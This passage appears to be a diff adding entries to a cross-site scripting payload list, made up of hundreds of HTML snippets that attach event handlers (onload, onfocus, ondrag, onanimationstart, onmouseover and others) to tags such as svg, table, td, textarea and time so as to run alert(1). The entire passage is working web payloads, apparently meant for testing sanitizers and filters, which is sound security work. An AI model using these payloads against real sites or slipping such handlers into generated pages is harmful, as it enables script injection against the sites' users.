+<style>@keyframes x{}</style><template style="animation-name:x" onanimationstart="alert(1)"></template> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationend="alert(1)"></textarea> +<style>@keyframes x{}</style><textarea style="animation-name:x" onanimationstart="alert(1)"></textarea> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationend="alert(1)"></tfoot> +<style>@keyframes x{}</style><tfoot style="animation-name:x" onanimationstart="alert(1)"></tfoot> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationend="alert(1)"></th> +<style>@keyframes x{}</style><th style="animation-name:x" onanimationstart="alert(1)"></th> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationend="alert(1)"></thead> +<style>@keyframes x{}</style><thead style="animation-name:x" onanimationstart="alert(1)"></thead> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationend="alert(1)"></time> +<style>@keyframes x{}</style><time style="animation-name:x" onanimationstart="alert(1)"></time> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationend="alert(1)"></title> +<style>@keyframes x{}</style><title style="animation-name:x" onanimationstart="alert(1)"></title> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationend="alert(1)"></tr> +<style>@keyframes x{}</style><tr style="animation-name:x" onanimationstart="alert(1)"></tr> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationend="alert(1)"></track> +<style>@keyframes x{}</style><track style="animation-name:x" onanimationstart="alert(1)"></track> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationend="alert(1)"></tt> +<style>@keyframes x{}</style><tt style="animation-name:x" onanimationstart="alert(1)"></tt> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationend="alert(1)"></u> +<style>@keyframes x{}</style><u style="animation-name:x" onanimationstart="alert(1)"></u> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationend="alert(1)"></ul> +<style>@keyframes x{}</style><ul style="animation-name:x" onanimationstart="alert(1)"></ul> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationend="alert(1)"></var> +<style>@keyframes x{}</style><var style="animation-name:x" onanimationstart="alert(1)"></var> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="alert(1)"></video> +<style>@keyframes x{}</style><video style="animation-name:x" onanimationstart="alert(1)"></video> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationend="alert(1)"></wbr> +<style>@keyframes x{}</style><wbr style="animation-name:x" onanimationstart="alert(1)"></wbr> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationend="alert(1)"></xmp> +<style>@keyframes x{}</style><xmp style="animation-name:x" onanimationstart="alert(1)"></xmp> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss> +<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss> +<sub draggable="true" ondrag="alert(1)">test</sub> +<sub draggable="true" ondragend="alert(1)">test</sub> +<sub draggable="true" ondragenter="alert(1)">test</sub> +<sub draggable="true" ondragleave="alert(1)">test</sub> +<sub draggable="true" ondragstart="alert(1)">test</sub> +<sub id=x tabindex=1 onactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforeactivate=alert(1)></sub> +<sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus> +<sub id=x tabindex=1 ondeactivate=alert(1)></sub><input id=y autofocus> +<sub id=x tabindex=1 onfocus=alert(1)></sub> +<sub id=x tabindex=1 onfocusin=alert(1)></sub> +<sub onbeforecopy="alert(1)" contenteditable>test</sub> +<sub onbeforecut="alert(1)" contenteditable>test</sub> +<sub onbeforepaste="alert(1)" contenteditable>test</sub> +<sub onblur=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onclick="alert(1)">test</sub> +<sub oncontextmenu="alert(1)">test</sub> +<sub oncopy="alert(1)" contenteditable>test</sub> +<sub oncut="alert(1)" contenteditable>test</sub> +<sub ondblclick="alert(1)">test</sub> +<sub onfocusout=alert(1) tabindex=1 id=x></sub><input autofocus> +<sub onkeydown="alert(1)" contenteditable>test</sub> +<sub onkeypress="alert(1)" contenteditable>test</sub> +<sub onkeyup="alert(1)" contenteditable>test</sub> +<sub onmousedown="alert(1)">test</sub> +<sub onmouseenter="alert(1)">test</sub> +<sub onmouseleave="alert(1)">test</sub> +<sub onmousemove="alert(1)">test</sub> +<sub onmouseout="alert(1)">test</sub> +<sub onmouseover="alert(1)">test</sub> +<sub onmouseup="alert(1)">test</sub> +<sub onpaste="alert(1)" contenteditable>test</sub> +<summary draggable="true" ondrag="alert(1)">test</summary> +<summary draggable="true" ondragend="alert(1)">test</summary> +<summary draggable="true" ondragenter="alert(1)">test</summary> +<summary draggable="true" ondragleave="alert(1)">test</summary> +<summary draggable="true" ondragstart="alert(1)">test</summary> +<summary id=x tabindex=1 onactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforeactivate=alert(1)></summary> +<summary id=x tabindex=1 onbeforedeactivate=alert(1)></summary><input autofocus> +<summary id=x tabindex=1 ondeactivate=alert(1)></summary><input id=y autofocus> +<summary id=x tabindex=1 onfocus=alert(1)></summary> +<summary id=x tabindex=1 onfocusin=alert(1)></summary> +<summary onbeforecopy="alert(1)" contenteditable>test</summary> +<summary onbeforecut="alert(1)" contenteditable>test</summary> +<summary onbeforepaste="alert(1)" contenteditable>test</summary> +<summary onblur=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onclick="alert(1)">test</summary> +<summary oncontextmenu="alert(1)">test</summary> +<summary oncopy="alert(1)" contenteditable>test</summary> +<summary oncut="alert(1)" contenteditable>test</summary> +<summary ondblclick="alert(1)">test</summary> +<summary onfocusout=alert(1) tabindex=1 id=x></summary><input autofocus> +<summary onkeydown="alert(1)" contenteditable>test</summary> +<summary onkeypress="alert(1)" contenteditable>test</summary> +<summary onkeyup="alert(1)" contenteditable>test</summary> +<summary onmousedown="alert(1)">test</summary> +<summary onmouseenter="alert(1)">test</summary> +<summary onmouseleave="alert(1)">test</summary> +<summary onmousemove="alert(1)">test</summary> +<summary onmouseout="alert(1)">test</summary> +<summary onmouseover="alert(1)">test</summary> +<summary onmouseup="alert(1)">test</summary> +<summary onpaste="alert(1)" contenteditable>test</summary> +<sup draggable="true" ondrag="alert(1)">test</sup> +<sup draggable="true" ondragend="alert(1)">test</sup> +<sup draggable="true" ondragenter="alert(1)">test</sup> +<sup draggable="true" ondragleave="alert(1)">test</sup> +<sup draggable="true" ondragstart="alert(1)">test</sup> +<sup id=x tabindex=1 onactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforeactivate=alert(1)></sup> +<sup id=x tabindex=1 onbeforedeactivate=alert(1)></sup><input autofocus> +<sup id=x tabindex=1 ondeactivate=alert(1)></sup><input id=y autofocus> +<sup id=x tabindex=1 onfocus=alert(1)></sup> +<sup id=x tabindex=1 onfocusin=alert(1)></sup> +<sup onbeforecopy="alert(1)" contenteditable>test</sup> +<sup onbeforecut="alert(1)" contenteditable>test</sup> +<sup onbeforepaste="alert(1)" contenteditable>test</sup> +<sup onblur=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onclick="alert(1)">test</sup> +<sup oncontextmenu="alert(1)">test</sup> +<sup oncopy="alert(1)" contenteditable>test</sup> +<sup oncut="alert(1)" contenteditable>test</sup> +<sup ondblclick="alert(1)">test</sup> +<sup onfocusout=alert(1) tabindex=1 id=x></sup><input autofocus> +<sup onkeydown="alert(1)" contenteditable>test</sup> +<sup onkeypress="alert(1)" contenteditable>test</sup> +<sup onkeyup="alert(1)" contenteditable>test</sup> +<sup onmousedown="alert(1)">test</sup> +<sup onmouseenter="alert(1)">test</sup> +<sup onmouseleave="alert(1)">test</sup> +<sup onmousemove="alert(1)">test</sup> +<sup onmouseout="alert(1)">test</sup> +<sup onmouseover="alert(1)">test</sup> +<sup onmouseup="alert(1)">test</sup> +<sup onpaste="alert(1)" contenteditable>test</sup> +<svg draggable="true" ondrag="alert(1)">test</svg> +<svg draggable="true" ondragend="alert(1)">test</svg> +<svg draggable="true" ondragenter="alert(1)">test</svg> +<svg draggable="true" ondragleave="alert(1)">test</svg> +<svg draggable="true" ondragstart="alert(1)">test</svg> +<svg id=x onfocus=alert(1)> +<svg id=x onfocusin=alert(1)> +<svg id=x tabindex=1 onactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforeactivate=alert(1)></svg> +<svg id=x tabindex=1 onbeforedeactivate=alert(1)></svg><input autofocus> +<svg id=x tabindex=1 ondeactivate=alert(1)></svg><input id=y autofocus> +<svg onbeforecopy="alert(1)" contenteditable>test</svg> +<svg onbeforecut="alert(1)" contenteditable>test</svg> +<svg onbeforepaste="alert(1)" contenteditable>test</svg> +<svg onblur=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onclick="alert(1)">test</svg> +<svg oncontextmenu="alert(1)">test</svg> +<svg oncopy="alert(1)" contenteditable>test</svg> +<svg oncut="alert(1)" contenteditable>test</svg> +<svg ondblclick="alert(1)">test</svg> +<svg onfocusout=alert(1) tabindex=1 id=x></svg><input autofocus> +<svg onkeydown="alert(1)" contenteditable>test</svg> +<svg onkeypress="alert(1)" contenteditable>test</svg> +<svg onkeyup="alert(1)" contenteditable>test</svg> +<svg onload=alert(1)> +<svg onmousedown="alert(1)">test</svg> +<svg onmouseenter="alert(1)">test</svg> +<svg onmouseleave="alert(1)">test</svg> +<svg onmousemove="alert(1)">test</svg> +<svg onmouseout="alert(1)">test</svg> +<svg onmouseover="alert(1)">test</svg> +<svg onmouseup="alert(1)">test</svg> +<svg onpaste="alert(1)" contenteditable>test</svg> +<svg onunload=window.open('javascript:alert(1)')> +<svg><a onload=alert(1)></a> +<svg><abbr onload=alert(1)></abbr> +<svg><acronym onload=alert(1)></acronym> +<svg><address onload=alert(1)></address> +<svg><animate onbegin=alert(1) attributeName=x dur=1s> +<svg><animate onend=alert(1) attributeName=x dur=1s> +<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 /> +<svg><animatetransform onbegin=alert(1) attributeName=transform> +<svg><animatetransform onend=alert(1) attributeName=transform dur=1s> +<svg><animatetransform onrepeat=alert(1) attributeName=transform repeatCount=2 dur=1s> +<svg><applet onload=alert(1)></applet> +<svg><area onload=alert(1)></area> +<svg><article onload=alert(1)></article> +<svg><aside onload=alert(1)></aside> +<svg><audio onload=alert(1)></audio> +<svg><b onload=alert(1)></b> +<svg><base onload=alert(1)></base> +<svg><basefont onload=alert(1)></basefont> +<svg><bdi onload=alert(1)></bdi> +<svg><bdo onload=alert(1)></bdo> +<svg><bgsound onload=alert(1)></bgsound> +<svg><big onload=alert(1)></big> +<svg><blink onload=alert(1)></blink> +<svg><blockquote onload=alert(1)></blockquote> +<svg><br onload=alert(1)></br> +<svg><button onload=alert(1)></button> +<svg><canvas onload=alert(1)></canvas> +<svg><caption onload=alert(1)></caption> +<svg><center onload=alert(1)></center> +<svg><cite onload=alert(1)></cite> +<svg><code onload=alert(1)></code> +<svg><col onload=alert(1)></col> +<svg><colgroup onload=alert(1)></colgroup> +<svg><command onload=alert(1)></command> +<svg><content onload=alert(1)></content> +<svg><data onload=alert(1)></data> +<svg><datalist onload=alert(1)></datalist> +<svg><dd onload=alert(1)></dd> +<svg><del onload=alert(1)></del> +<svg><details onload=alert(1)></details> +<svg><dfn onload=alert(1)></dfn> +<svg><dialog onload=alert(1)></dialog> +<svg><dir onload=alert(1)></dir> +<svg><discard onbegin=alert(1)> +<svg><div onload=alert(1)></div> +<svg><dl onload=alert(1)></dl> +<svg><dt onload=alert(1)></dt> +<svg><element onload=alert(1)></element> +<svg><em onload=alert(1)></em> +<svg><fieldset onload=alert(1)></fieldset> +<svg><figcaption onload=alert(1)></figcaption> +<svg><figure onload=alert(1)></figure> +<svg><font onload=alert(1)></font> +<svg><footer onload=alert(1)></footer> +<svg><form onload=alert(1)></form> +<svg><frameset onload=alert(1)></frameset> +<svg><h1 onload=alert(1)></h1> +<svg><head onload=alert(1)></head> +<svg><header onload=alert(1)></header> +<svg><hgroup onload=alert(1)></hgroup> +<svg><hr onload=alert(1)></hr> +<svg><html onload=alert(1)></html> +<svg><i onload=alert(1)></i> +<svg><image href=1 onerror=alert(1)> +<svg><image href=validimage.png onload=alert(1)> +<svg><ins onload=alert(1)></ins> +<svg><kbd onload=alert(1)></kbd> +<svg><keygen onload=alert(1)></keygen> +<svg><label onload=alert(1)></label> +<svg><legend onload=alert(1)></legend> +<svg><li onload=alert(1)></li> +<svg><listing onload=alert(1)></listing> +<svg><main onload=alert(1)></main> +<svg><map onload=alert(1)></map> +<svg><mark onload=alert(1)></mark> +<svg><marquee onload=alert(1)></marquee> +<svg><menu onload=alert(1)></menu> +<svg><menuitem onload=alert(1)></menuitem> +<svg><meta onload=alert(1)></meta> +<svg><meter onload=alert(1)></meter> +<svg><multicol onload=alert(1)></multicol> +<svg><nav onload=alert(1)></nav> +<svg><nextid onload=alert(1)></nextid> +<svg><nobr onload=alert(1)></nobr> +<svg><noembed onload=alert(1)></noembed> +<svg><noframes onload=alert(1)></noframes> +<svg><noscript onload=alert(1)></noscript> +<svg><ol onload=alert(1)></ol> +<svg><optgroup onload=alert(1)></optgroup> +<svg><option onload=alert(1)></option> +<svg><output onload=alert(1)></output> +<svg><p onload=alert(1)></p> +<svg><param onload=alert(1)></param> +<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1"> +<svg><path><animateMotion onend=alert(1) dur=1s repeatCount=1> +<svg><path><animateMotion onrepeat=alert(1) dur="1s" repeatCount="2"> +<svg><picture onload=alert(1)></picture> +<svg><plaintext onload=alert(1)></plaintext> +<svg><pre onload=alert(1)></pre> +<svg><progress onload=alert(1)></progress> +<svg><q onload=alert(1)></q> +<svg><rb onload=alert(1)></rb> +<svg><rp onload=alert(1)></rp> +<svg><rt onload=alert(1)></rt> +<svg><rtc onload=alert(1)></rtc> +<svg><ruby onload=alert(1)></ruby> +<svg><s onload=alert(1)></s> +<svg><samp onload=alert(1)></samp> +<svg><section onload=alert(1)></section> +<svg><select onload=alert(1)></select> +<svg><set onbegin=alert(1) attributename=x dur=1s> +<svg><set onend=alert(1) attributename=x dur=1s> +<svg><set onrepeat=alert(1) attributename=x dur=1s repeatcount=2> +<svg><shadow onload=alert(1)></shadow> +<svg><slot onload=alert(1)></slot> +<svg><small onload=alert(1)></small> +<svg><source onload=alert(1)></source> +<svg><spacer onload=alert(1)></spacer> +<svg><span onload=alert(1)></span> +<svg><strike onload=alert(1)></strike> +<svg><strong onload=alert(1)></strong> +<svg><sub onload=alert(1)></sub> +<svg><summary onload=alert(1)></summary> +<svg><sup onload=alert(1)></sup> +<svg><table onload=alert(1)></table> +<svg><tbody onload=alert(1)></tbody> +<svg><td onload=alert(1)></td> +<svg><template onload=alert(1)></template> +<svg><textarea onload=alert(1)></textarea> +<svg><tfoot onload=alert(1)></tfoot> +<svg><th onload=alert(1)></th> +<svg><thead onload=alert(1)></thead> +<svg><time onload=alert(1)></time> +<svg><title onload=alert(1)></title> +<svg><tr onload=alert(1)></tr> +<svg><tt onload=alert(1)></tt> +<svg><u onload=alert(1)></u> +<svg><ul onload=alert(1)></ul> +<svg><var onload=alert(1)></var> +<svg><video onload=alert(1)></video> +<svg><wbr onload=alert(1)></wbr> +<svg><xmp onload=alert(1)></xmp> +<svg><xss onload=alert(1)></xss> +<table draggable="true" ondrag="alert(1)">test</table> +<table draggable="true" ondragend="alert(1)">test</table> +<table draggable="true" ondragenter="alert(1)">test</table> +<table draggable="true" ondragleave="alert(1)">test</table> +<table draggable="true" ondragstart="alert(1)">test</table> +<table id=x tabindex=1 onactivate=alert(1)></table> +<table id=x tabindex=1 onbeforeactivate=alert(1)></table> +<table id=x tabindex=1 onbeforedeactivate=alert(1)></table><input autofocus> +<table id=x tabindex=1 ondeactivate=alert(1)></table><input id=y autofocus> +<table id=x tabindex=1 onfocus=alert(1)></table> +<table id=x tabindex=1 onfocusin=alert(1)></table> +<table onbeforecopy="alert(1)" contenteditable>test</table> +<table onbeforecut="alert(1)" contenteditable>test</table> +<table onbeforepaste="alert(1)" contenteditable>test</table> +<table onblur=alert(1) tabindex=1 id=x></table><input autofocus> +<table onclick="alert(1)">test</table> +<table oncontextmenu="alert(1)">test</table> +<table oncopy="alert(1)" contenteditable>test</table> +<table oncut="alert(1)" contenteditable>test</table> +<table ondblclick="alert(1)">test</table> +<table onfocusout=alert(1) tabindex=1 id=x></table><input autofocus> +<table onkeydown="alert(1)" contenteditable>test</table> +<table onkeypress="alert(1)" contenteditable>test</table> +<table onkeyup="alert(1)" contenteditable>test</table> +<table onmousedown="alert(1)">test</table> +<table onmouseenter="alert(1)">test</table> +<table onmouseleave="alert(1)">test</table> +<table onmousemove="alert(1)">test</table> +<table onmouseout="alert(1)">test</table> +<table onmouseover="alert(1)">test</table> +<table onmouseup="alert(1)">test</table> +<table onpaste="alert(1)" contenteditable>test</table> +<tbody draggable="true" ondrag="alert(1)">test</tbody> +<tbody draggable="true" ondragend="alert(1)">test</tbody> +<tbody draggable="true" ondragenter="alert(1)">test</tbody> +<tbody draggable="true" ondragleave="alert(1)">test</tbody> +<tbody draggable="true" ondragstart="alert(1)">test</tbody> +<tbody id=x tabindex=1 onactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforeactivate=alert(1)></tbody> +<tbody id=x tabindex=1 onbeforedeactivate=alert(1)></tbody><input autofocus> +<tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus> +<tbody id=x tabindex=1 onfocus=alert(1)></tbody> +<tbody id=x tabindex=1 onfocusin=alert(1)></tbody> +<tbody onbeforecopy="alert(1)" contenteditable>test</tbody> +<tbody onbeforecut="alert(1)" contenteditable>test</tbody> +<tbody onbeforepaste="alert(1)" contenteditable>test</tbody> +<tbody onblur=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onclick="alert(1)">test</tbody> +<tbody oncontextmenu="alert(1)">test</tbody> +<tbody oncopy="alert(1)" contenteditable>test</tbody> +<tbody oncut="alert(1)" contenteditable>test</tbody> +<tbody ondblclick="alert(1)">test</tbody> +<tbody onfocusout=alert(1) tabindex=1 id=x></tbody><input autofocus> +<tbody onkeydown="alert(1)" contenteditable>test</tbody> +<tbody onkeypress="alert(1)" contenteditable>test</tbody> +<tbody onkeyup="alert(1)" contenteditable>test</tbody> +<tbody onmousedown="alert(1)">test</tbody> +<tbody onmouseenter="alert(1)">test</tbody> +<tbody onmouseleave="alert(1)">test</tbody> +<tbody onmousemove="alert(1)">test</tbody> +<tbody onmouseout="alert(1)">test</tbody> +<tbody onmouseover="alert(1)">test</tbody> +<tbody onmouseup="alert(1)">test</tbody> +<tbody onpaste="alert(1)" contenteditable>test</tbody> +<td draggable="true" ondrag="alert(1)">test</td> +<td draggable="true" ondragend="alert(1)">test</td> +<td draggable="true" ondragenter="alert(1)">test</td> +<td draggable="true" ondragleave="alert(1)">test</td> +<td draggable="true" ondragstart="alert(1)">test</td> +<td id=x tabindex=1 onactivate=alert(1)></td> +<td id=x tabindex=1 onbeforeactivate=alert(1)></td> +<td id=x tabindex=1 onbeforedeactivate=alert(1)></td><input autofocus> +<td id=x tabindex=1 ondeactivate=alert(1)></td><input id=y autofocus> +<td id=x tabindex=1 onfocus=alert(1)></td> +<td id=x tabindex=1 onfocusin=alert(1)></td> +<td onbeforecopy="alert(1)" contenteditable>test</td> +<td onbeforecut="alert(1)" contenteditable>test</td> +<td onbeforepaste="alert(1)" contenteditable>test</td> +<td onblur=alert(1) tabindex=1 id=x></td><input autofocus> +<td onclick="alert(1)">test</td> +<td oncontextmenu="alert(1)">test</td> +<td oncopy="alert(1)" contenteditable>test</td> +<td oncut="alert(1)" contenteditable>test</td> +<td ondblclick="alert(1)">test</td> +<td onfocusout=alert(1) tabindex=1 id=x></td><input autofocus> +<td onkeydown="alert(1)" contenteditable>test</td> +<td onkeypress="alert(1)" contenteditable>test</td> +<td onkeyup="alert(1)" contenteditable>test</td> +<td onmousedown="alert(1)">test</td> +<td onmouseenter="alert(1)">test</td> +<td onmouseleave="alert(1)">test</td> +<td onmousemove="alert(1)">test</td> +<td onmouseout="alert(1)">test</td> +<td onmouseover="alert(1)">test</td> +<td onmouseup="alert(1)">test</td> +<td onpaste="alert(1)" contenteditable>test</td> +<template draggable="true" ondrag="alert(1)">test</template> +<template draggable="true" ondragend="alert(1)">test</template> +<template draggable="true" ondragenter="alert(1)">test</template> +<template draggable="true" ondragleave="alert(1)">test</template> +<template draggable="true" ondragstart="alert(1)">test</template> +<template id=x tabindex=1 onactivate=alert(1)></template> +<template id=x tabindex=1 onbeforeactivate=alert(1)></template> +<template id=x tabindex=1 onbeforedeactivate=alert(1)></template><input autofocus> +<template id=x tabindex=1 ondeactivate=alert(1)></template><input id=y autofocus> +<template id=x tabindex=1 onfocus=alert(1)></template> +<template id=x tabindex=1 onfocusin=alert(1)></template> +<template onbeforecopy="alert(1)" contenteditable>test</template> +<template onbeforecut="alert(1)" contenteditable>test</template> +<template onbeforepaste="alert(1)" contenteditable>test</template> +<template onblur=alert(1) tabindex=1 id=x></template><input autofocus> +<template onclick="alert(1)">test</template> +<template oncontextmenu="alert(1)">test</template> +<template oncopy="alert(1)" contenteditable>test</template> +<template oncut="alert(1)" contenteditable>test</template> +<template ondblclick="alert(1)">test</template> +<template onfocusout=alert(1) tabindex=1 id=x></template><input autofocus> +<template onkeydown="alert(1)" contenteditable>test</template> +<template onkeypress="alert(1)" contenteditable>test</template> +<template onkeyup="alert(1)" contenteditable>test</template> +<template onmousedown="alert(1)">test</template> +<template onmouseenter="alert(1)">test</template> +<template onmouseleave="alert(1)">test</template> +<template onmousemove="alert(1)">test</template> +<template onmouseout="alert(1)">test</template> +<template onmouseover="alert(1)">test</template> +<template onmouseup="alert(1)">test</template> +<template onpaste="alert(1)" contenteditable>test</template> +<textarea autofocus onfocus=alert(1)>test</textarea> +<textarea autofocus onfocusin=alert(1)>test</textarea> +<textarea draggable="true" ondrag="alert(1)">test</textarea> +<textarea draggable="true" ondragend="alert(1)">test</textarea> +<textarea draggable="true" ondragenter="alert(1)">test</textarea> +<textarea draggable="true" ondragleave="alert(1)">test</textarea> +<textarea draggable="true" ondragstart="alert(1)">test</textarea> +<textarea id=x tabindex=1 onactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforeactivate=alert(1)></textarea> +<textarea id=x tabindex=1 onbeforedeactivate=alert(1)></textarea><input autofocus> +<textarea id=x tabindex=1 ondeactivate=alert(1)></textarea><input id=y autofocus> +<textarea onauxclick=alert(1)>XSS</textarea> +<textarea onbeforecopy=alert(1) autofocus>XSS</textarea> +<textarea onbeforecut=alert(1) autofocus>XSS</textarea> +<textarea onbeforepaste=alert(1) autofocus></textarea> +<textarea onblur=alert(1) id=x></textarea><input autofocus> +<textarea onchange=alert(1)>XSS</textarea> +<textarea onclick="alert(1)">test</textarea> +<textarea oncontextmenu="alert(1)">test</textarea> +<textarea oncopy=alert(1) autofocus>XSS</textarea> +<textarea oncut=alert(1) autofocus>XSS</textarea> +<textarea ondblclick="alert(1)">test</textarea> +<textarea onfocusout=alert(1) id=x></textarea><input autofocus> +<textarea oninput=alert(1)>XSS</textarea> +<textarea onkeydown="alert(1)" contenteditable>test</textarea> +<textarea onkeypress="alert(1)" contenteditable>test</textarea> +<textarea onkeyup="alert(1)" contenteditable>test</textarea> +<textarea onmousedown="alert(1)">test</textarea> +<textarea onmouseenter="alert(1)">test</textarea> +<textarea onmouseleave="alert(1)">test</textarea> +<textarea onmousemove="alert(1)">test</textarea> +<textarea onmouseout="alert(1)">test</textarea> +<textarea onmouseover="alert(1)">test</textarea> +<textarea onmouseup="alert(1)">test</textarea> +<textarea onpaste=alert(1) autofocus></textarea> +<textarea onselect=alert(1) autofocus>XSS</textarea> +<tfoot draggable="true" ondrag="alert(1)">test</tfoot> +<tfoot draggable="true" ondragend="alert(1)">test</tfoot> +<tfoot draggable="true" ondragenter="alert(1)">test</tfoot> +<tfoot draggable="true" ondragleave="alert(1)">test</tfoot> +<tfoot draggable="true" ondragstart="alert(1)">test</tfoot> +<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforeactivate=alert(1)></tfoot> +<tfoot id=x tabindex=1 onbeforedeactivate=alert(1)></tfoot><input autofocus> +<tfoot id=x tabindex=1 ondeactivate=alert(1)></tfoot><input id=y autofocus> +<tfoot id=x tabindex=1 onfocus=alert(1)></tfoot> +<tfoot id=x tabindex=1 onfocusin=alert(1)></tfoot> +<tfoot onbeforecopy="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforecut="alert(1)" contenteditable>test</tfoot> +<tfoot onbeforepaste="alert(1)" contenteditable>test</tfoot> +<tfoot onblur=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onclick="alert(1)">test</tfoot> +<tfoot oncontextmenu="alert(1)">test</tfoot> +<tfoot oncopy="alert(1)" contenteditable>test</tfoot> +<tfoot oncut="alert(1)" contenteditable>test</tfoot> +<tfoot ondblclick="alert(1)">test</tfoot> +<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot><input autofocus> +<tfoot onkeydown="alert(1)" contenteditable>test</tfoot> +<tfoot onkeypress="alert(1)" contenteditable>test</tfoot> +<tfoot onkeyup="alert(1)" contenteditable>test</tfoot> +<tfoot onmousedown="alert(1)">test</tfoot> +<tfoot onmouseenter="alert(1)">test</tfoot> +<tfoot onmouseleave="alert(1)">test</tfoot> +<tfoot onmousemove="alert(1)">test</tfoot> +<tfoot onmouseout="alert(1)">test</tfoot> +<tfoot onmouseover="alert(1)">test</tfoot> +<tfoot onmouseup="alert(1)">test</tfoot> +<tfoot onpaste="alert(1)" contenteditable>test</tfoot> +<th draggable="true" ondrag="alert(1)">test</th> +<th draggable="true" ondragend="alert(1)">test</th> +<th draggable="true" ondragenter="alert(1)">test</th> +<th draggable="true" ondragleave="alert(1)">test</th> +<th draggable="true" ondragstart="alert(1)">test</th> +<th id=x tabindex=1 onactivate=alert(1)></th> +<th id=x tabindex=1 onbeforeactivate=alert(1)></th> +<th id=x tabindex=1 onbeforedeactivate=alert(1)></th><input autofocus> +<th id=x tabindex=1 ondeactivate=alert(1)></th><input id=y autofocus> +<th id=x tabindex=1 onfocus=alert(1)></th> +<th id=x tabindex=1 onfocusin=alert(1)></th> +<th onbeforecopy="alert(1)" contenteditable>test</th> +<th onbeforecut="alert(1)" contenteditable>test</th> +<th onbeforepaste="alert(1)" contenteditable>test</th> +<th onblur=alert(1) tabindex=1 id=x></th><input autofocus> +<th onclick="alert(1)">test</th> +<th oncontextmenu="alert(1)">test</th> +<th oncopy="alert(1)" contenteditable>test</th> +<th oncut="alert(1)" contenteditable>test</th> +<th ondblclick="alert(1)">test</th> +<th onfocusout=alert(1) tabindex=1 id=x></th><input autofocus> +<th onkeydown="alert(1)" contenteditable>test</th> +<th onkeypress="alert(1)" contenteditable>test</th> +<th onkeyup="alert(1)" contenteditable>test</th> +<th onmousedown="alert(1)">test</th> +<th onmouseenter="alert(1)">test</th> +<th onmouseleave="alert(1)">test</th> +<th onmousemove="alert(1)">test</th> +<th onmouseout="alert(1)">test</th> +<th onmouseover="alert(1)">test</th> +<th onmouseup="alert(1)">test</th> +<th onpaste="alert(1)" contenteditable>test</th> +<thead draggable="true" ondrag="alert(1)">test</thead> +<thead draggable="true" ondragend="alert(1)">test</thead> +<thead draggable="true" ondragenter="alert(1)">test</thead> +<thead draggable="true" ondragleave="alert(1)">test</thead> +<thead draggable="true" ondragstart="alert(1)">test</thead> +<thead id=x tabindex=1 onactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforeactivate=alert(1)></thead> +<thead id=x tabindex=1 onbeforedeactivate=alert(1)></thead><input autofocus> +<thead id=x tabindex=1 ondeactivate=alert(1)></thead><input id=y autofocus> +<thead id=x tabindex=1 onfocus=alert(1)></thead> +<thead id=x tabindex=1 onfocusin=alert(1)></thead> +<thead onbeforecopy="alert(1)" contenteditable>test</thead> +<thead onbeforecut="alert(1)" contenteditable>test</thead> +<thead onbeforepaste="alert(1)" contenteditable>test</thead> +<thead onblur=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onclick="alert(1)">test</thead> +<thead oncontextmenu="alert(1)">test</thead> +<thead oncopy="alert(1)" contenteditable>test</thead> +<thead oncut="alert(1)" contenteditable>test</thead> +<thead ondblclick="alert(1)">test</thead> +<thead onfocusout=alert(1) tabindex=1 id=x></thead><input autofocus> +<thead onkeydown="alert(1)" contenteditable>test</thead> +<thead onkeypress="alert(1)" contenteditable>test</thead> +<thead onkeyup="alert(1)" contenteditable>test</thead> +<thead onmousedown="alert(1)">test</thead> +<thead onmouseenter="alert(1)">test</thead> +<thead onmouseleave="alert(1)">test</thead> +<thead onmousemove="alert(1)">test</thead> +<thead onmouseout="alert(1)">test</thead> +<thead onmouseover="alert(1)">test</thead> +<thead onmouseup="alert(1)">test</thead> +<thead onpaste="alert(1)" contenteditable>test</thead> +<time draggable="true" ondrag="alert(1)">test</time> +<time draggable="true" ondragend="alert(1)">test</time> +<time draggable="true" ondragenter="alert(1)">test</time> +<time draggable="true" ondragleave="alert(1)">test</time> +<time draggable="true" ondragstart="alert(1)">test</time> +<time id=x tabindex=1 onactivate=alert(1)></time> +<time id=x tabindex=1 onbeforeactivate=alert(1)></time> +<time id=x tabindex=1 onbeforedeactivate=alert(1)></time><input autofocus> +<time id=x tabindex=1 ondeactivate=alert(1)></time><input id=y autofocus> +<time id=x tabindex=1 onfocus=alert(1)></time> +<time id=x tabindex=1 onfocusin=alert(1)></time> +<time onbeforecopy="alert(1)" contenteditable>test</time> +<time onbeforecut="alert(1)" contenteditable>test</time> +<time onbeforepaste="alert(1)" contenteditable>test</time> +<time onblur=alert(1) tabindex=1 id=x></time><input autofocus> 